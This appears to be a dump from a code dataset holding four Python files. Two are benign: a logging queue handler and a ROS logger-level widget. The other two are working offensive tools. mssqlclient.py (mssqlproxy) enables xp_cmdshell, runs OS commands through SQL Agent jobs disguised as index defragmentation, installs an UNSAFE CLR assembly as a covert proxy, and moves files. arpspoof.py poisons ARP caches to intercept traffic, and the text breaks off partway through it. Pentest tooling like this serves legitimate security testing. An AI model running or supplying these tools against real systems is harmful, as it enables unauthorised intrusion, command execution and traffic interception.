source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
queue_channel.py
|
# -*- coding: utf-8 -*-
# Copyright © 2017 Apple Inc. All rights reserved.
#
# Use of this source code is governed by a BSD-3-clause license that can
# be found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause
# Copyright (c) 2008-2013 by Vinay Sajip.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * The name(s) of the copyright holder(s) may not be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER(S) "AS IS" AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL THE COPYRIGHT HOLDER(S) BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
This module contains classes which help you work with queues. A typical
application is when you want to log from performance-critical threads, but
where the handlers you want to use are slow (for example,
:class:`~logging.handlers.SMTPHandler`). In that case, you can create a queue,
pass it to a :class:`QueueHandler` instance and use that instance with your
loggers. Elsewhere, you can instantiate a :class:`QueueListener` with the same
queue and some slow handlers, and call :meth:`~QueueListener.start` on it.
This will start monitoring the queue on a separate thread and call all the
configured handlers *on that thread*, so that your logging thread is not held
up by the slow handlers.
Note that as well as in-process queues, you can use these classes with queues
from the :mod:`multiprocessing` module.
**N.B.** This is part of the standard library since Python 3.2, so the
version here is for use with earlier Python versions.
"""
from __future__ import print_function as _
from __future__ import division as _
from __future__ import absolute_import as _
import logging
try:
import Queue as queue
except ImportError:
import queue
import threading
class QueueHandler(logging.Handler):
"""
This handler sends events to a queue. Typically, it would be used together
with a multiprocessing Queue to centralise logging to file in one process
(in a multi-process application), so as to avoid file write contention
between processes.
:param queue: The queue to send `LogRecords` to.
"""
def __init__(self, queue):
"""
Initialise an instance, using the passed queue.
"""
logging.Handler.__init__(self)
self.queue = queue
def enqueue(self, record):
"""
Enqueue a record.
The base implementation uses :meth:`~queue.Queue.put_nowait`. You may
want to override this method if you want to use blocking, timeouts or
custom queue implementations.
:param record: The record to enqueue.
"""
self.queue.put_nowait(record)
def prepare(self, record):
"""
Prepares a record for queuing. The object returned by this method is
enqueued.
The base implementation formats the record to merge the message
and arguments, and removes unpickleable items from the record
in-place.
You might want to override this method if you want to convert
the record to a dict or JSON string, or send a modified copy
of the record while leaving the original intact.
:param record: The record to prepare.
"""
# The format operation gets traceback text into record.exc_text
# (if there's exception data), and also puts the message into
# record.message. We can then use this to replace the original
# msg + args, as these might be unpickleable. We also zap the
# exc_info attribute, as it's no longer needed and, if not None,
# will typically not be pickleable.
self.format(record)
record.msg = record.message
record.args = None
record.exc_info = None
return record
def emit(self, record):
"""
Emit a record.
Writes the LogRecord to the queue, preparing it for pickling first.
:param record: The record to emit.
"""
try:
self.enqueue(self.prepare(record))
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
class QueueListener(object):
"""
This class implements an internal threaded listener which watches for
LogRecords being added to a queue, removes them and passes them to a
list of handlers for processing.
:param record: The queue to listen to.
:param handlers: The handlers to invoke on everything received from
the queue.
"""
_sentinel = None
def __init__(self, queue, *handlers):
"""
Initialise an instance with the specified queue and
handlers.
"""
self.queue = queue
self.handlers = handlers
self._stop = threading.Event()
self._thread = None
def dequeue(self, block):
"""
Dequeue a record and return it, optionally blocking.
The base implementation uses :meth:`~queue.Queue.get`. You may want to
override this method if you want to use timeouts or work with custom
queue implementations.
:param block: Whether to block if the queue is empty. If `False` and
the queue is empty, an :class:`~queue.Empty` exception
will be thrown.
"""
return self.queue.get(block)
def start(self):
"""
Start the listener.
This starts up a background thread to monitor the queue for
LogRecords to process.
"""
self._thread = t = threading.Thread(target=self._monitor)
t.setDaemon(True)
t.start()
def prepare(self , record):
"""
Prepare a record for handling.
This method just returns the passed-in record. You may want to
override this method if you need to do any custom marshalling or
manipulation of the record before passing it to the handlers.
:param record: The record to prepare.
"""
return record
def handle(self, record):
"""
Handle a record.
This just loops through the handlers offering them the record
to handle.
:param record: The record to handle.
"""
record = self.prepare(record)
for handler in self.handlers:
handler.handle(record)
def _monitor(self):
"""
Monitor the queue for records, and ask the handler
to deal with them.
This method runs on a separate, internal thread.
The thread will terminate if it sees a sentinel object in the queue.
"""
q = self.queue
has_task_done = hasattr(q, 'task_done')
while not self._stop.isSet():
try:
record = self.dequeue(True)
if record is self._sentinel:
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
pass
# There might still be records in the queue.
while True:
try:
record = self.dequeue(False)
if record is self._sentinel:
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
break
def enqueue_sentinel(self):
"""
Writes a sentinel to the queue to tell the listener to quit. This
implementation uses ``put_nowait()``. You may want to override this
method if you want to use timeouts or work with custom queue
implementations.
"""
self.queue.put_nowait(self._sentinel)
def stop(self):
"""
Stop the listener.
This asks the thread to terminate, and then waits for it to do so.
Note that if you don't call this before your application exits, there
may be some records still left on the queue, which won't be processed.
"""
self._stop.set()
self.enqueue_sentinel()
self._thread.join()
self._thread = None
class MutableQueueListener(QueueListener):
def __init__(self, queue, *handlers):
super(MutableQueueListener, self).__init__(queue, *handlers)
"""
Initialise an instance with the specified queue and
handlers.
"""
# Changing this to a list from tuple in the parent class
self.handlers = list(handlers)
def addHandler(self, handler):
if handler not in self.handlers:
self.handlers.append(handler)
def removeHandler(self, handler):
if handler in self.handlers:
self.handlers.remove(handler)
|
logger_item.py
|
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, Fraunhofer FKIE/US, Alexander Tiderko
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Fraunhofer nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from python_qt_binding.QtCore import Qt, Signal
from python_qt_binding.QtGui import QColor
try:
from python_qt_binding.QtGui import QFrame, QHBoxLayout, QLabel, QRadioButton
except ImportError:
from python_qt_binding.QtWidgets import QFrame, QHBoxLayout, QLabel, QRadioButton
import rospy
try:
import xmlrpclib as xmlrpcclient
except ImportError:
import xmlrpc.client as xmlrpcclient
import threading
import sys
try:
from roscpp.srv import SetLoggerLevel, SetLoggerLevelRequest
except ImportError as err:
sys.stderr.write("Cannot import SetLoggerLevel service definition: %s" % err)
import fkie_node_manager as nm
class LoggerItem(QFrame):
'''
Represents one ROS logger and offers methods to change the logger level.
'''
success_signal = Signal(str)
error_signal = Signal(str)
def __init__(self, nodename, masteruri, loggername, level='INFO', parent=None):
'''
Creates a new item.
'''
QFrame.__init__(self, parent)
self.setObjectName("LoggerItem")
self.nodename = nodename
self.masteruri = masteruri
self.loggername = loggername
self.current_level = None
layout = QHBoxLayout(self)
layout.setContentsMargins(1, 1, 1, 1)
self.debug = QRadioButton()
self.debug.setStyleSheet("QRadioButton{ background-color: #39B54A;}") # QColor(57, 181, 74)
self.debug.toggled.connect(self.toggled_debug)
layout.addWidget(self.debug)
self.info = QRadioButton()
self.info.setStyleSheet("QRadioButton{ background-color: #FFFAFA;}")
self.info.toggled.connect(self.toggled_info)
layout.addWidget(self.info)
self.warn = QRadioButton()
self.warn.setStyleSheet("QRadioButton{ background-color: #FFC706;}") # QColor(255, 199, 6)
self.warn.toggled.connect(self.toggled_warn)
layout.addWidget(self.warn)
self.error = QRadioButton()
self.error.setStyleSheet("QRadioButton{ background-color: #DE382B;}") # QColor(222, 56, 43)
self.error.toggled.connect(self.toggled_error)
layout.addWidget(self.error)
self.fatal = QRadioButton()
self.fatal.setStyleSheet("QRadioButton{ background-color: #FF0000;}")
self.fatal.toggled.connect(self.toggled_fatal)
layout.addWidget(self.fatal)
self.label = QLabel(loggername)
layout.addWidget(self.label)
layout.addStretch()
self._callback = None # used to set all logger
self.success_signal.connect(self.on_succes_update)
self.error_signal.connect(self.on_error_update)
self.set_level(level)
def set_callback(self, callback):
self._callback = callback
def toggled_debug(self, state):
if state:
self.set_level('DEBUG')
def toggled_info(self, state):
if state:
self.set_level('INFO')
def toggled_warn(self, state):
if state:
self.set_level('WARN')
def toggled_error(self, state):
if state:
self.set_level('ERROR')
def toggled_fatal(self, state):
if state:
self.set_level('FATAL')
def on_succes_update(self, level):
if level.upper() == 'DEBUG':
self.debug.setChecked(True)
elif level.upper() == 'INFO':
self.info.setChecked(True)
elif level.upper() == 'WARN':
self.warn.setChecked(True)
elif level.upper() == 'ERROR':
self.error.setChecked(True)
elif level.upper() == 'FATAL':
self.fatal.setChecked(True)
elif level:
rospy.logwarn("loglevel not found '%s'" % (level))
return
self.current_level = level
def on_error_update(self, level):
self.on_succes_update(level)
def set_level(self, level, force=False):
if self.current_level is not None or force:
if self._callback is not None:
self._callback(level)
else:
# call set loglevel service
thread = threading.Thread(target=self._set_level, kwargs={'level': level, 'current_level': self.current_level})
thread.setDaemon(True)
thread.start()
pass
else:
self.on_succes_update(level)
def _set_level(self, level, current_level):
try:
backup_level = current_level
service_name = '%s/set_logger_level' % self.nodename
# get service URI from ROS-Master
master = xmlrpcclient.ServerProxy(self.masteruri)
code, _, serviceuri = master.lookupService(rospy.get_name(), service_name)
if code == 1:
self.call_service_set_level(serviceuri, service_name, self.loggername, level)
self.success_signal.emit(level)
except rospy.ServiceException as e:
rospy.logwarn("Set logger %s for %s to %s failed: %s" % (self.loggername, self.nodename, level, e))
if backup_level is not None:
self.error_signal.emit(backup_level)
@classmethod
def call_service_set_level(cls, serviceuri, servicename, loggername, level):
_req, _resp = nm.starter().callService(serviceuri, servicename, SetLoggerLevel, service_args=[loggername, level])
|
mssqlclient.py
|
#!/usr/bin/env python
#
# Copyright (c) 2020 BlackArrow
#
#
# This product includes software developed by
# SecureAuth Corporation (https://www.secureauth.com/).
#
# Description: [MS-TDS] & [MC-SQLR] example.
#
# Original author:
# Alberto Solino (beto@coresecurity.com/@agsolino)
#
# Author:
# Pablo Martinez (https://twitter.com/xassiz)
#
from __future__ import division
from __future__ import print_function
import argparse
import sys
import os
import logging
import socket
import threading
import select
from impacket.examples import logger
from impacket import version, tds
# Proxy config
MSG_END_OF_TRANSIMISSION = b"\x31\x41\x59\x26\x53\x58\x97\x93\x23\x84"
MSG_EXIT_CMD = b"\x12\x34\x56"
MSG_EXIT_ACK = b"\x65\x43\x21"
ASSEMBLY_NAME = "Microsoft.SqlServer.Proxy"
PROCEDURE_NAME = "sp_start_proxy"
def set_configuration(mssql, option, value):
mssql.batch("exec master.dbo.sp_configure '%s',%d; RECONFIGURE;" % (option, value))
return check_configuration(mssql, option, value)
def check_configuration(mssql, option, value):
try:
res = mssql.batch("SELECT cast(value as INT) as v FROM sys.configurations where name = '%s'" % option)[0]['v']
return res == value
except:
return False
def file_exists(mssql, path):
try:
res = mssql.batch("DECLARE @r INT; EXEC master.dbo.xp_fileexist '%s', @r OUTPUT; SELECT @r as n" % path)[0]['n']
return res == 1
except:
return False
def proxy_install(mssql, args):
logging.info("Proxy mode: install")
if set_configuration(mssql, 'show advanced options', 1) == False:
logging.error("Cannot enable 'show advanced options'")
return
if set_configuration(mssql, 'clr enabled', 1) == False:
logging.error("Cannot enable CLR")
return
else:
logging.info("CLR enabled")
with open(args.clr, 'rb') as f:
data = f.read().hex()
mssql.batch("USE msdb; CREATE ASSEMBLY [%s] FROM 0x%s WITH PERMISSION_SET = UNSAFE" % (ASSEMBLY_NAME, data))
res = mssql.batch("USE msdb; SELECT COUNT(*) AS n FROM sys.assemblies where name = '%s'" % ASSEMBLY_NAME)[0]['n']
if res == 1:
logging.info("Assembly successfully installed")
mssql.batch("CREATE PROCEDURE [dbo].[%s]"
" @path NVARCHAR (4000), @client_addr NVARCHAR (4000), @client_port INTEGER"
" AS EXTERNAL NAME [%s].[StoredProcedures].[sp_start_proxy]" % (PROCEDURE_NAME, ASSEMBLY_NAME))
res = mssql.batch("SELECT COUNT(*) AS n FROM sys.procedures where name = '%s'" % PROCEDURE_NAME)[0]['n']
if res == 1:
logging.info("Procedure successfully installed")
else:
logging.error("Cannot install procedure")
else:
logging.error("Cannot install assembly")
def proxy_uninstall(mssql, args):
logging.info("Proxy mode: uninstall")
res = mssql.batch("USE msdb; DROP PROCEDURE [%s]; SELECT COUNT(*) AS n FROM sys.procedures where name = '%s' " % (PROCEDURE_NAME, PROCEDURE_NAME))[0]['n']
if res == 0:
logging.info("Procedure successfully uninstalled")
else:
logging.error("Cannot uninstall procedure")
res = mssql.batch("DROP ASSEMBLY [%s]; SELECT COUNT(*) AS n FROM sys.assemblies where name = '%s' " % (ASSEMBLY_NAME, ASSEMBLY_NAME))[0]['n']
if res == 0:
logging.info("Assembly successfully uninstalled")
else:
logging.error("Cannot uninstall assembly")
if set_configuration(mssql, 'show advanced options', 1) == False:
logging.error("Cannot enable 'show advanced options'")
else:
if set_configuration(mssql, 'clr enabled', 0) == False:
logging.error("Cannot disable CLR")
else:
logging.info("CLR disabled")
def proxy_check(mssql, args):
success = True
logging.info("Proxy mode: check")
res = mssql.batch("USE msdb; SELECT COUNT(*) AS n FROM sys.assemblies where name = '%s'" % ASSEMBLY_NAME)[0]['n']
if res == 1:
logging.info("Assembly is installed")
else:
success = False
logging.error("Assembly not found")
res = mssql.batch("SELECT COUNT(*) AS n FROM sys.procedures where name = '%s'" % PROCEDURE_NAME)[0]['n']
if res == 1:
logging.info("Procedure is installed")
else:
success = False
logging.error("Procedure not found")
if file_exists(mssql, args.reciclador):
logging.info("reciclador is installed")
else:
success = False
logging.error("reciclador not found")
if check_configuration(mssql, 'clr enabled', 1):
logging.info("clr enabled")
else:
success = False
logging.error("clr disabled")
return success
def proxy_worker(server, client):
logging.info("New connection")
client.setblocking(0)
while True:
readable, writable, errfds = select.select([client, server], [], [], 60)
for sock in readable:
if sock is client:
data = client.recv(2048)
if len(data) == 0:
logging.info("Client disconnected!")
logging.debug("Sending end-of-tranmission")
server.sendall(MSG_END_OF_TRANSIMISSION)
return
logging.debug("Client: %s" % data.hex())
server.sendall(data)
elif sock is server:
data = server.recv(2048)
if len(data) == 0:
logging.info("Server disconnected!")
return
logging.debug("Server: %s" % data.hex())
client.sendall(data)
def proxy_start(mssql, args):
if not proxy_check(mssql, args):
return
logging.info("Proxy mode: start")
laddr, lport = mssql.socket.getsockname()
if args.no_check_src_port:
lport = 0
logging.info("Connection is not direct")
else:
logging.debug("Local addr = %s:%d" % (laddr, lport))
local_port = getattr(args, 'local_port')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.bind(("0.0.0.0", local_port))
except Exception as err:
logging.error("Error: '%s'" % err)
return
logging.info("Listening on port %d..." % local_port)
try:
mssql.batch("DECLARE @ip varchar(15); SET @ip=TRIM(CONVERT(char(15), CONNECTIONPROPERTY('client_net_address')));"
"EXEC msdb.dbo.%s '%s', @ip, %d" % (PROCEDURE_NAME, args.reciclador, lport), tuplemode=False, wait=False)
data = mssql.socket.recv(2048)
if b'Powered by blackarrow.net' in data:
logging.info("ACK from server!")
mssql.socket.sendall(b"ACK")
else:
logging.error("cannot establish connection")
raise Exception('cannot establish connection')
s.listen(10)
while True:
client, _ = s.accept()
t = threading.Thread(target=proxy_worker, args=(mssql.socket, client))
t.start()
except:
mssql.socket.sendall(MSG_EXIT_CMD)
ack = mssql.socket.recv(1024)
if MSG_EXIT_ACK in ack:
logging.info("Bye!")
else:
logging.error("Server did not ack :(")
return
if __name__ == '__main__':
import cmd
class SQLSHELL(cmd.Cmd):
def __init__(self, SQL):
cmd.Cmd.__init__(self)
self.sql = SQL
self.prompt = 'SQL> '
self.intro = '[!] Press help for extra shell commands'
def do_help(self, line):
print("""
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd
download {remote} {local} - download a remote file to a local path
upload {local} {remote} - upload a local file to a remote path (OLE required)
enable_ole - you know what it means
disable_ole - you know what it means
""")
def do_download(self, params):
try:
remote, local = params.split(' ')
except:
logging.error("download: invalid params")
return
print("[+] Downloading '%s' to '%s'..." % (remote, local))
try:
self.sql.sql_query("SELECT * FROM OPENROWSET(BULK N'%s', SINGLE_BLOB) rs" % remote)
data = self.sql.rows[0]['BulkColumn']
with open(local, 'wb') as f:
f.write(bytes.fromhex(data.decode()))
print("[+] Download completed")
except Exception as e:
print(str(e))
def do_upload(self, params):
try:
local, remote = params.split(' ')
except:
logging.error("upload: invalid params")
return
if check_configuration(self.sql, 'Ole Automation Procedures', 0):
if self.do_enable_ole(None) == False:
return
print("[+] Uploading '%s' to '%s'..." % (local, remote))
try:
with open(local, 'rb') as f:
data = f.read()
print("[+] Size is %d bytes" % len(data))
hexdata = "0x%s" % data.hex()
self.sql.sql_query("DECLARE @ob INT;"
"EXEC sp_OACreate 'ADODB.Stream', @ob OUTPUT;"
"EXEC sp_OASetProperty @ob, 'Type', 1;"
"EXEC sp_OAMethod @ob, 'Open';"
"EXEC sp_OAMethod @ob, 'Write', NULL, %s;"
"EXEC sp_OAMethod @ob, 'SaveToFile', NULL, '%s', 2;"
"EXEC sp_OAMethod @ob, 'Close';"
"EXEC sp_OADestroy @ob;" % (hexdata, remote))
if file_exists(self.sql, remote):
print("[+] Upload completed")
else:
print("[-] Error uploading - writable?")
except Exception as e:
print("[-] Error - " + str(e))
def do_enable_ole(self, line):
try:
if set_configuration(self.sql, 'show advanced options', 1) == False:
logging.error("cannot enable 'show advanced options'")
return False
if set_configuration(self.sql, 'Ole Automation Procedures', 1) == False:
logging.error("cannot enable 'Ole Automation Procedures'")
return False
except:
return True
def do_disable_ole(self, line):
try:
if set_configuration(self.sql, 'show advanced options', 1) == False:
logging.error("cannot enable 'show advanced options'")
return False
if set_configuration(self.sql, 'Ole Automation Procedures', 0) == False:
logging.error("cannot disable 'Ole Automation Procedures'")
return False
except:
return True
def do_shell(self, s):
os.system(s)
def do_xp_cmdshell(self, s):
try:
self.sql.sql_query("exec master..xp_cmdshell '%s'--sp_password" % s.replace("'", "''"))
self.sql.printReplies()
self.sql.colMeta[0]['TypeData'] = 80*2
for row in self.sql.rows:
for col in self.sql.colMeta:
if row[col['Name']] == 'NULL':
print('')
else:
print(row[col['Name']])
# self.sql.printRows()
except:
pass
def sp_start_job(self, s):
try:
self.sql.sql_query("DECLARE @job NVARCHAR(100);"
"SET @job='IdxDefrag'+CONVERT(NVARCHAR(36),NEWID());"
"EXEC msdb..sp_add_job @job_name=@job,@description='INDEXDEFRAG',"
"@owner_login_name='sa',@delete_level=3;"
"EXEC msdb..sp_add_jobstep @job_name=@job,@step_id=1,@step_name='Defragmentation',"
"@subsystem='CMDEXEC',@command='%s',@on_success_action=1;"
"EXEC msdb..sp_add_jobserver @job_name=@job;"
"EXEC msdb..sp_start_job @job_name=@job;" % s)
self.sql.printReplies()
self.sql.printRows()
except:
pass
def do_lcd(self, s):
if s == '':
print(os.getcwd())
else:
os.chdir(s)
def do_enable_xp_cmdshell(self, line):
try:
self.sql.sql_query("exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;"
"exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;")
self.sql.printReplies()
self.sql.printRows()
except:
pass
def do_disable_xp_cmdshell(self, line):
try:
self.sql.sql_query("exec sp_configure 'xp_cmdshell', 0 ;RECONFIGURE;exec sp_configure "
"'show advanced options', 0 ;RECONFIGURE;")
self.sql.printReplies()
self.sql.printRows()
except:
pass
def default(self, line):
try:
self.sql.sql_query(line)
self.sql.printReplies()
self.sql.printRows()
except:
pass
def emptyline(self):
pass
def do_exit(self, line):
return True
# Init the example's logger theme
logger.init()
print(version.BANNER)
print("mssqlproxy - Copyright 2020 BlackArrow")
parser = argparse.ArgumentParser(add_help = True, description = "TDS client implementation (SSL supported).")
parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
parser.add_argument('-port', action='store', default='1433', help='target MSSQL port (default 1433)')
parser.add_argument('-db', action='store', help='MSSQL database instance (default None)')
parser.add_argument('-windows-auth', action='store_true', default = 'False', help='whether or not to use Windows '
'Authentication (default False)')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-file', type=argparse.FileType('r'), help='input file with commands to execute in the SQL shell')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '
'ones specified in the command line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If '
'ommited it use the domain part (FQDN) specified in the target parameter')
# Proxy mode arguments
group = parser.add_argument_group('proxy mode')
group.add_argument('-reciclador', action="store", metavar = "path", help='Remote path where DLL is stored in server')
group.add_argument('-install', action="store_true", help='Installs CLR assembly')
group.add_argument('-uninstall', action="store_true", help='Uninstalls CLR assembly')
group.add_argument('-check', action="store_true", help='Checks if CLR is ready')
group.add_argument('-start', action="store_true", help='Starts proxy')
group.add_argument('-local-port', action="store", metavar = "port", type=int, default=1337, help='Local port to listen on')
group.add_argument('-clr', action="store", metavar="local_path", help='Local CLR path')
group.add_argument('-no-check-src-port', action="store_true", help='Use this option when connection is not direct (e.g. proxy)')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
import re
domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(
options.target).groups('')
#In case the password contains '@'
if '@' in address:
password = password + '@' + address.rpartition('@')[0]
address = address.rpartition('@')[2]
if domain is None:
domain = ''
if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
from getpass import getpass
password = getpass("Password:")
if options.aesKey is not None:
options.k = True
# If proxy params
if any(getattr(options, l) for l in ['reciclador', 'install', 'uninstall', 'check', 'start', 'clr']):
proxy_mode = True
if sum((options.install, options.uninstall, options.check, options.start)) != 1:
logging.error("please, choose one of the following actions: install, uninstall, check, start")
sys.exit(1)
if (options.start or options.check) and not options.reciclador:
logging.error("reciclador path is mandatory")
sys.exit(1)
if options.install and not options.clr:
logging.error("CLR path is mandatory")
sys.exit(1)
else:
proxy_mode = False
ms_sql = tds.MSSQL(address, int(options.port))
ms_sql.connect()
try:
if options.k is True:
res = ms_sql.kerberosLogin(options.db, username, password, domain, options.hashes, options.aesKey,
kdcHost=options.dc_ip)
else:
res = ms_sql.login(options.db, username, password, domain, options.hashes, options.windows_auth)
ms_sql.printReplies()
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.error(str(e))
res = False
if res is True:
# If proxy mode
if proxy_mode:
proxy_opt = {
'install' : proxy_install,
'uninstall': proxy_uninstall,
'check' : proxy_check,
'start' : proxy_start
}
opt = next(mode for mode in proxy_opt.keys() if getattr(options, mode))
proxy_opt[opt](ms_sql, options)
# Shell mode
else:
shell = SQLSHELL(ms_sql)
if options.file is None:
shell.cmdloop()
else:
for line in options.file.readlines():
print("SQL> %s" % line, end=' ')
shell.onecmd(line)
ms_sql.disconnect()
|
arpspoof.py
|
# Source: https://github.com/ickerwx/arpspoof
import sys
import threading
from Queue import Queue
import time
from scapy.all import *
class ARPspoof:
# index values into tuples
IP = CMD = 0
MAC = TARGET = 1
# Colours for print
__GREEN = '\033[92m'
__RED = '\033[91m'
__ENDC = '\033[0m'
__BOLD = '\033[1m'
# constructor
def __init__(self, interface, targets, gateway):
self.__interface = interface
self.__targets = targets
self.__gateway = gateway
def get_MAC(self, interface, target_IP):
# get the MAC address of target_IP and return it
source_IP = get_if_addr(interface)
source_MAC = get_if_hwaddr(interface)
p = ARP(hwsrc=source_MAC, psrc=source_IP) # ARP request by default
p.hwdst = 'ff:ff:ff:ff:ff:ff'
p.pdst = target_IP
reply, unans = sr(p, timeout=5, verbose=0)
if len(unans) > 0:
# received no reply
raise Exception('Error finding MAC for %s, try using -i' % target_IP)
return reply[0][1].hwsrc
def start_poison_thread(self, targets, gateway, control_queue, attacker_MAC):
finish = False
# the control queue is used to send commands to the poison thread
# as soon as the thread finds the queue not empty, it will stop poisoning
# and evaluate the item in the queue. It will process the command and then
# either continue poisoning or finish its execution
while not finish:
# as long as no elements are in the queue, we will send ARP messages
while control_queue.empty():
for t in targets:
self.send_ARP(t[self.IP], t[self.MAC], gateway[self.IP], attacker_MAC)
self.send_ARP(gateway[self.IP], gateway[self.MAC], t[self.IP], attacker_MAC)
time.sleep(1)
# queue not empty, pull the element out of the queue to empty it again
try:
# item is a 2-element tuple (command, (IP, MAC))
# item[CMD] = command, item[TARGET] = (IP, MAC)
item = control_queue.get(block=False)
except Empty:
# The Empty exception is thrown when there is no element in the
# queue. Something clearly is not working as it should...
print(RED + 'Something broke, your queue idea sucks.' + ENDC)
cmd = item[self.CMD].lower()
if cmd in ['quit', 'exit', 'stop', 'leave']:
# command to terminate the thread received
finish = True
# we are done, reset every host
self.restore_ARP_caches(targets, gateway)
def restore_ARP_caches(self, targets, gateway, verbose=True):
# send correct ARP responses to the targets and the gateway
print(self.__BOLD + 'Stopping the attack, restoring ARP cache' + self.__ENDC)
for i in xrange(3):
if verbose:
print(self.__BOLD + "ARP %s is at %s" % (gateway[self.IP], gateway[self.MAC]) + self.__ENDC)
for t in targets:
if verbose:
print(self.__BOLD + "ARP %s is at %s" % (t[self.IP], t[self.MAC]) + self.__ENDC)
self.send_ARP(t[self.IP], t[self.MAC], gateway[self.IP], gateway[self.MAC])
self.send_ARP(gateway[self.IP], gateway[self.MAC], t[self.IP], t[self.MAC])
time.sleep(1)
print(self.__GREEN + 'Restored ARP caches' + self.__ENDC)
def send_ARP(self, destination_IP, destination_MAC, source_IP, source_MAC):
# op=2 is ARP response
# psrc/hwsrc is the data we want the destination to have
arp_packet = ARP(op=2, pdst=destination_IP, hwdst=destination_MAC, psrc=source_IP, hwsrc=source_MAC)
send(arp_packet, verbose=0)
def runARP(self):
control_queue = Queue()
# use supplied interface or let scapy choose one
interface = self.__interface or get_working_if()
attacker_MAC = get_if_hwaddr(interface)
print(self.__BOLD + 'Using interface %s (%s)' % (interface, attacker_MAC) + self.__ENDC)
try:
# self.__targets should be a comma-separated string of IP-Adresses
# 10.1.1.2,10.1.1.32,10.1.1.45
# targets is a list of (IP, MAC) tuples
targets = [(t.strip(), self.get_MAC(interface, t.strip())) for t in self.__targets.split(',')]
except Exception, e:
# Exception most likely because get_MAC failed, check if targets or gateway are
# actually valid IP addresses
print(self.__RED + e.message + self.__ENDC)
sys.exit(1)
# same as above, gateway is a (IP, MAC) tuple
try:
# self.__gateway is a single IP address
gateway = (self.__gateway, self.get_MAC(interface, self.__gateway))
except Exception, e:
print(self.__RED + e.message + self.__ENDC)
sys.exit(2)
# create and start the poison thread
poison_thread = threading.Thread(target=self.start_poison_thread, args=(targets, gateway, control_queue, attacker_MAC))
poison_thread.start()
try:
while poison_thread.is_alive():
time.sleep(1) # delay is a quick hack to kind of sync output
# w/o this, the thread output messes up the prompt
# TODO: think of something a little less ugly
command = raw_input('arpspoof# ').split()
if command:
